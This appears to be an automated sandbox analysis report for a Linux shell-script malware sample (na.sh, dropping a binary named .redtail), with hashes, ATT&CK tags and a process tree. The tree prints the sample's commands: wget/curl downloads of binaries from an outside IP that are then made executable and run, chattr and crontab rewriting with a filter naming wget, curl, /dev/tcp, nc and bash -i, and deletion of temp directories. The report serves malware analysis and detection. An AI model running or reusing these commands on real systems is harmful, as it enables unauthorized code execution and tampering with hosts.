f18e352338ba21f9da7541c0025cc4c8a8febdebbe0bf057478ee3ce691571c8

Analysis

max time kernel
56s
max time network
58s
platform
debian-9_mipsel
resource
debian9-mipsel-20240418-en
resource tags

arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
12-10-2024 06:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

na.sh
Size

1KB
MD5

178c9bea5410e5116df6a89c32ed3e3e
SHA1

49e63c7cea087a414ee03be92153842f39214155
SHA256

f18e352338ba21f9da7541c0025cc4c8a8febdebbe0bf057478ee3ce691571c8
SHA512

db921274de9a5d2d04531503e1dfc80fb8f87d1913cffa05737a6317bd812d9afb598e8dfcd25db2af9534c15e47d092695c69a50fd35e6d86fd13ef113c330e

Score

7^/10

defense_evasion discovery upx

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 5 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
868	chmod
875	chmod
904	chmod
769	chmod
857	chmod

Executes dropped EXE 4 IoCs

ioc	pid	Process
/.redtail	859	.redtail
/.redtail	869	.redtail
/.redtail	876	.redtail
/.redtail	906	.redtail

Attempts to change immutable files 22 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
814	chattr
782	chattr
783	chattr
793	chattr
812	chattr
803	grep
806	chattr
810	chattr
816	grep
785	grep
790	grep
795	grep
799	grep
802	chattr
808	grep
815	chattr
777	chattr
784	chattr
789	chattr
797	chattr
776	chattr
778	grep

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/fstream-18.dat	upx
behavioral4/files/fstream-20.dat	upx
behavioral4/files/fstream-24.dat	upx

Enumerates kernel/hardware configuration 1 TTPs 2 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl
File opened for reading	/sys/fs/kdbus/0-system/bus	systemctl

Reads runtime system information 20 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/mounts	cat
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/self/maps	awk
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/filesystems	mv
File opened for reading	/proc/filesystems	mv

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/clean_crontab	sh

/tmp/na.sh
/tmp/na.sh
1⤵
PID:714
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  - Reads runtime system information
  PID:721
- /bin/grep
  grep noexec
  2⤵
  PID:720
- /bin/cat
  cat /proc/mounts
  2⤵
  - Reads runtime system information
  PID:719
- /usr/bin/whoami
  whoami
  2⤵
  PID:729
- /usr/bin/find
  find / -type d -user root -perm "-u=rwx" -not -path "/tmp/*" -not -path "/proc/*" -not -path /sys -not -path "/sys/*" -not -path /proc -not -path "/proc/*" -not -path /dev/pts -not -path "/dev/pts/*" -not -path /run -not -path "/run/*" -not -path /sys/kernel/security -not -path "/sys/kernel/security/*" -not -path /run/lock -not -path "/run/lock/*" -not -path /sys/fs/cgroup -not -path "/sys/fs/cgroup/*" -not -path /sys/fs/cgroup/systemd -not -path "/sys/fs/cgroup/systemd/*" -not -path "/sys/fs/cgroup/cpu,cpuacct" -not -path "/sys/fs/cgroup/cpu,cpuacct/*" -not -path /sys/fs/cgroup/freezer -not -path "/sys/fs/cgroup/freezer/*" -not -path "/sys/fs/cgroup/net_cls,net_prio" -not -path "/sys/fs/cgroup/net_cls,net_prio/*" -not -path /sys/fs/cgroup/memory -not -path "/sys/fs/cgroup/memory/*" -not -path /sys/fs/cgroup/blkio -not -path "/sys/fs/cgroup/blkio/*" -not -path /sys/fs/cgroup/pids -not -path "/sys/fs/cgroup/pids/*" -not -path /sys/fs/cgroup/devices -not -path "/sys/fs/cgroup/devices/*" -not -path /sys/fs/cgroup/cpuset -not -path "/sys/fs/cgroup/cpuset/*" -not -path /sys/fs/cgroup/perf_event -not -path "/sys/fs/cgroup/perf_event/*"
  2⤵
  - Reads runtime system information
  PID:731
- /bin/uname
  uname -mp
  2⤵
  PID:758
- /usr/bin/touch
  touch .testfile
  2⤵
  PID:759
- /bin/dd
  dd "if=/dev/zero" "of=.testfile2" "bs=2M" "count=1"
  2⤵
  PID:761
- /bin/rm
  rm -rf .testfile .testfile2
  2⤵
  PID:764
- /usr/bin/wget
  wget http://154.216.17.30/clean
  2⤵
  PID:765
- /bin/chmod
  chmod +x clean
  2⤵
  - File and Directory Permissions Modification
  PID:769
- /bin/sh
  sh clean
  2⤵
  - Writes file to tmp directory
  PID:770
- - /bin/systemctl
    systemctl disable c3pool_miner
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:772
- - /bin/systemctl
    systemctl stop c3pool_miner
    3⤵
    - Enumerates kernel/hardware configuration
    - Reads runtime system information
    PID:774
- - /usr/bin/chattr
    chattr -ia /var/spool/cron/crontabs
    3⤵
    - Attempts to change immutable files
    PID:776
- - /usr/bin/chattr
    chattr -ia /etc/crontab
    3⤵
    - Attempts to change immutable files
    PID:777
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/crontab
    3⤵
    - Attempts to change immutable files
    PID:778
- - /bin/mv
    mv /tmp/clean_crontab /etc/crontab
    3⤵
    - Reads runtime system information
    PID:780
- - /usr/bin/chattr
    chattr -ia /etc/cron.hourly
    3⤵
    - Attempts to change immutable files
    PID:782
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily
    3⤵
    - Attempts to change immutable files
    PID:783
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/apt-compat
    3⤵
    - Attempts to change immutable files
    PID:784
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/apt-compat
    3⤵
    - Attempts to change immutable files
    PID:785
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/apt-compat
    3⤵
    - Reads runtime system information
    PID:787
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/bsdmainutils
    3⤵
    - Attempts to change immutable files
    PID:789
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/bsdmainutils
    3⤵
    - Attempts to change immutable files
    PID:790
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/bsdmainutils
    3⤵
    - Reads runtime system information
    PID:791
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/dpkg
    3⤵
    - Attempts to change immutable files
    PID:793
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/dpkg
    3⤵
    - Attempts to change immutable files
    PID:795
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/dpkg
    3⤵
    - Reads runtime system information
    PID:796
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/exim4-base
    3⤵
    - Attempts to change immutable files
    PID:797
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/exim4-base
    3⤵
    - Attempts to change immutable files
    PID:799
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/exim4-base
    3⤵
    - Reads runtime system information
    PID:801
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/logrotate
    3⤵
    - Attempts to change immutable files
    PID:802
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/logrotate
    3⤵
    - Attempts to change immutable files
    PID:803
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/logrotate
    3⤵
    - Reads runtime system information
    PID:805
- - /usr/bin/chattr
    chattr -ia /etc/cron.daily/passwd
    3⤵
    - Attempts to change immutable files
    PID:806
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/passwd
    3⤵
    - Attempts to change immutable files
    PID:808
- - /bin/mv
    mv /tmp/clean_crontab /etc/cron.daily/passwd
    3⤵
    - Reads runtime system information
    PID:809
- - /usr/bin/chattr
    chattr -ia /etc/cron.weekly
    3⤵
    - Attempts to change immutable files
    PID:810
- - /usr/bin/chattr
    chattr -ia /etc/cron.monthly
    3⤵
    - Attempts to change immutable files
    PID:812
- - /usr/bin/chattr
    chattr -ia /etc/cron.d
    3⤵
    - Attempts to change immutable files
    PID:814
- - /usr/bin/chattr
    chattr -ia /etc/anacrontab
    3⤵
    - Attempts to change immutable files
    PID:815
- - /bin/grep
    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/anacrontab
    3⤵
    - Attempts to change immutable files
    PID:816
- - /bin/mv
    mv /tmp/clean_crontab /etc/anacrontab
    3⤵
    - Reads runtime system information
    PID:818
- - /bin/rm
    rm -rf /tmp/na.sh
    3⤵
    PID:820
- - /bin/rm
    rm -rf "/var/tmp/*"
    3⤵
    PID:821
- - /bin/rm
    rm -rf "/dev/shm/*"
    3⤵
    PID:822
- /bin/rm
  rm -rf clean
  2⤵
  PID:823
- /bin/rm
  rm -rf .redtail
  2⤵
  PID:825
- /bin/grep
  grep -q x86_64
  2⤵
  PID:828
- /bin/grep
  grep -q amd64
  2⤵
  PID:830
- /bin/grep
  grep -q "i[3456]86"
  2⤵
  PID:832
- /bin/grep
  grep -q armv8
  2⤵
  PID:835
- /bin/grep
  grep -q aarch64
  2⤵
  PID:838
- /bin/grep
  grep -q armv7
  2⤵
  PID:840
- /usr/bin/wget
  wget http://154.216.17.30/x86_64
  2⤵
  PID:842
- /bin/cat
  cat x86_64
  2⤵
  PID:856
- /bin/chmod
  chmod +x .redtail
  2⤵
  - File and Directory Permissions Modification
  PID:857
- /.redtail
  ./.redtail
  2⤵
  - Executes dropped EXE
  PID:859
- /bin/rm
  rm -rf x86_64
  2⤵
  PID:862
- /usr/bin/wget
  wget http://154.216.17.30/i686
  2⤵
  PID:864
- /bin/cat
  cat i686
  2⤵
  PID:867
- /bin/chmod
  chmod +x .redtail
  2⤵
  - File and Directory Permissions Modification
  PID:868
- /.redtail
  ./.redtail
  2⤵
  - Executes dropped EXE
  PID:869
- /bin/rm
  rm -rf i686
  2⤵
  PID:871
- /usr/bin/wget
  wget http://154.216.17.30/arm8
  2⤵
  PID:872
- /usr/bin/curl
  curl -O http://154.216.17.30/arm8
  2⤵
  - Reads runtime system information
  PID:873
- /bin/cat
  cat arm8
  2⤵
  PID:874
- /bin/chmod
  chmod +x .redtail
  2⤵
  - File and Directory Permissions Modification
  PID:875
- /.redtail
  ./.redtail
  2⤵
  - Executes dropped EXE
  PID:876
- /bin/rm
  rm -rf arm8
  2⤵
  PID:877
- /usr/bin/wget
  wget http://154.216.17.30/arm7
  2⤵
  PID:878
- /bin/cat
  cat arm7
  2⤵
  PID:903
- /bin/chmod
  chmod +x .redtail
  2⤵
  - File and Directory Permissions Modification
  PID:904
- /.redtail
  ./.redtail
  2⤵
  - Executes dropped EXE
  PID:906
- /bin/rm
  rm -rf arm7
  2⤵
  PID:909

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/.testfile2

Filesize
2.0MB

MD5
b2d1236c286a3c0704224fe4105eca49

SHA1
7d76d48d64d7ac5411d714a4bb83f37e3e5b8df6

SHA256
5647f05ec18958947d32874eeb788fa396a05d0bab7c1b71f112ceb7e9b31eee

SHA512
731859029215873fdac1c9f2f8bd25a334abf0f3a9e1b057cf2cacc2826d86b0c26a3fa920a936421401c0471f38857cb53ba905489ea46b185209fdff65b3b6

Download Submit
/arm7

Filesize
1.1MB

MD5
c453c0bed34360586bcb04a1b9b903c5

SHA1
7189049a66b1ff32cfd3dae28727c21680eb2e34

SHA256
c1aad34e379fb2f7658756025dee4c6e3d7abe7ed6b46834d03cec155776dc42

SHA512
674f783176a8a9254755c48bc72bc959f538b36dd1e40cb7960b66c73f4e4659b5657c716b25183a2855a42a4d0006129cd77d74c499d8481b27a811016cd66a

Download Submit
/arm8

Filesize
153B

MD5
998368d7c95ea4293237f2320546e440

SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4

SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736

SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Download Submit
/clean

Filesize
795B

MD5
397ff5e54194072e6d8a44a0d8cc1b27

SHA1
42477b0c3b277b5e907b0a35c644f3291ed30a63

SHA256
d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e

SHA512
ff40c129e3b2891ae280bce97e52ee69aea18ca60ea7901f7efd4cf11d3bf1c4ee48e9eb90e5f045e080ab784ee2a9942c2bcf0a531b7f4602931f63c4b32d74

Download Submit
/i686

Filesize
1.6MB

MD5
ee125336e3ad079ed14d40d1e9085b69

SHA1
5be3757d0ccf5cd311174e8792d79001522cc5ad

SHA256
09c3204915b877a36938809593eb66672ff46173afc01f309c62cbd948b25bac

SHA512
c5a8432b3c826d73aef4f47f08088ba1a3443e1241981c8106fe452694046cab49e46b6e90b2dc22f319bf05cee95a1134f50bb3603c10c6b46b9011dca31a8c

Download Submit
/tmp/clean_crontab

Filesize
1KB

MD5
30e858769aacd9cc309502f8d5c6aa0f

SHA1
927c06dd4d6cbb5ca02e9505011c8667c47f2d6e

SHA256
eff406c0943e1399e3e15fdb6ca2893a187d6b273f5bd9d17eec4e4b4c52b8cd

SHA512
f7f6e70925afe54fc2fdaae13a750b3c49fde9fa59d80af321885d270112ebb2291f034037708f1ba8515f3e3e1ca0a493cd1e002895aa699c469e0365ccde3c

Download Submit
/tmp/clean_crontab

Filesize
3KB

MD5
02f33c9e59b27bcd241e488cd48de072

SHA1
9247eee9b2310d56455beccf41c577ba16b78e3d

SHA256
2565ab0cb86a8cb7fd37a0401ad22624da886b8df9130a5bd4b566f404130c14

SHA512
1eda274264320a72cd58462b6c8a7747990a7eedf836be730b51b92ea6b04a1005aed596f9b9d53c4c8a93001d112450d0c6d83dfe4eee4b91a671623662fb3d

Download Submit
/tmp/clean_crontab

Filesize
249B

MD5
db990990933b6f56322725223f13c2bc

SHA1
387303696a796e27f559c73679e979f2a538072d

SHA256
777a9112ee093d8683645b031eb6cfeb9ce77274f40575c48ff2054ea24114d1

SHA512
a3764e580bcfe0b2100da8ff2a00bed4936cb2acc9985daef52fb0310a7ed3367a1944a355c3f1dbc92d82c82b54280926736f81bc138efb4f7df1814abee3b5

Download Submit
/tmp/clean_crontab

Filesize
722B

MD5
8f111d100ea459f68d333d63a8ef2205

SHA1
077ca9c46a964de67c0f7765745d5c6f9e2065c3

SHA256
0e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354

SHA512
d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb

Download Submit
/tmp/clean_crontab

Filesize
1KB

MD5
bc4a71cbcaeed4179f25d798257fa980

SHA1
61445721d0b5d86ac0a8386a4ceef450118f4fbb

SHA256
8eeae3a9df22621d51062e4dadfc5c63b49732b38a37b5d4e52c99c2237e5767

SHA512
709badb4dd1a15a10b34f82d31ed4bbab81698190d2ec94e2ad3dcdc90d97b893eb61cde72f08e517a8beea08ec1d675385fd42a9e77530981b7d83c6bd3548c

Download Submit
/tmp/clean_crontab

Filesize
279B

MD5
911a774fe040993b929504f3d9415ab3

SHA1
55ccc8e95097f005abf9f4d91a14394e6d0f5da5

SHA256
340dfc483eb79b83b0630b1c0b339e30ebd724ef2f58bb87ba92946472e8e63d

SHA512
1eb8fd8dc6fd444ba2fa3ca7e863894cfb19383e5b20c700ed24aa615402340424d093a761632cf27a3e789ecd548ca972806e154161635da4f97b415d6fc64f

Download Submit
/x86_64

Filesize
1.6MB

MD5
d13d24b429d2689336f191e389d160f5

SHA1
9ec54faeffd467e7986f74ad40abe61b0a497706

SHA256
5c8724d9938418ac2cddf71445d78b8b38bf55af2df51a4162912a9a12736547

SHA512
3b5bb99a65dc10ab8d7068b57f80c9fd3695d9e4c377759c0760759bc4c74d04e7c6068cb51dd86ea89f6f4c2407ddfa37cc221145023f0feeaf59dfc46171ea

Download Submit